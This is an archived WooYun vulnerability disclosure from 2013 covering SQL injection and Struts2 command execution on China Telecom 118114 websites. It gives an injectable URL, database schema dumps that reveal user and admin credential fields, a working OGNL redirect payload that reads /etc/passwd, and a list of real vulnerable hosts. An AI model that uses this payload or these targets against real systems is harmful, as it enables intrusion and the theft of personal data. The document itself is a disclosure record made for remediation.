乌云(WooYun.org)历史漏洞查询---http://wy.zone.ci/
乌云 Drops 文章在线浏览--------http://drop.zone.ci/
2013-07-23: 细节已通知厂商并且等待厂商处理中 2013-07-27: 厂商已经确认,细节仅向厂商公开 2013-08-06: 细节向核心白帽子及相关领域专家公开 2013-08-16: 细节向普通白帽子公开 2013-08-26: 细节向实习白帽子公开 2013-09-06: 细节向公众公开
中国电信118114某站SQL注入及命令执行
1# sql注入:招聘主站
"http://zj.118114.cn:8080/default/joblist?district=330000&keyword=1"
数据
表及数量Database: zp+---------------+---------+| Table | Entries |+---------------+---------+| t_user | 17841 || t_job | 7131 || t_jobcate | 2779 || t_company | 2280 || t_admin | 12 || t_apply | 5 || t_admin_group | 3 |+---------------+---------+
admin字段
Database: zpTable: t_admin[12 columns]+-------------+-------------+| Column | Type |+-------------+-------------+| gender | tinyint(4) || groupid | int(11) || id | int(11) || isadmin | tinyint(4) || isdelete | tinyint(4) || name | varchar(30) || password | varchar(32) || perms | text || update_date | int(11) || update_id | int(11) || username | varchar(30) || valid | tinyint(4) |+-------------+-------------+
user字段
Database: zpTable: t_user[30 columns]+-------------------+--------------+| Column | Type |+-------------------+--------------+| age | int(11) || contact_alternate | varchar(255) || dest_city_id | int(11) || dest_district | varchar(10) || dest_district_id | int(11) || dest_province_id | int(11) || education | varchar(10) || email | varchar(50) || id | int(11) || id_card | varchar(50) || include_comm | smallint(6) || include_food | smallint(6) || include_lodging | smallint(6) || isdelete | tinyint(4) || job_cate | int(11) || job_kind | varchar(100) || login_times | int(11) || memo | text || mobile | varchar(50) || name | varchar(50) || org_city_id | int(11) || org_district | varchar(10) || org_district_id | int(11) || org_province_id | int(11) || password | varchar(50) || salary_high | int(11) || salary_low | int(11) || sex | smallint(6) || status | smallint(6) || working_years | varchar(50) |+-------------------+--------------+
17841 名选手
2#命令执行EXP
?redirect:${%23a%3d(new%20java.lang.ProcessBuilder(new%20java.lang.String[]{'cat','/etc/passwd'})).start(),%23b%3d%23a.getInputStream(),%23c%3dnew%20java.io.InputStreamReader(%23b),%23d%3dnew%20java.io.BufferedReader(%23c),%23e%3dnew%20char[50000],%23d.read(%23e),%23matt%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23matt.getWriter().println(%23e),%23matt.getWriter().flush(),%23matt.getWriter().close()}
主站
http://tools.118114.cn/cx/client/downloadway.do
分站1江苏
http://202.102.41.95/JSVideoInTraffic/portalPage/news!ToDETAILS.action
可debug
http://202.102.41.95/JSVideoInTraffic/portalPage/news!ToDETAILS.action?formInfo.fID=3'
分站2福建
http://piao.fj.118114.cn/piao/dy/cinema!desc.action
过滤&升级
危害等级:高
漏洞Rank:12
确认时间:2013-07-27 18:47
暂无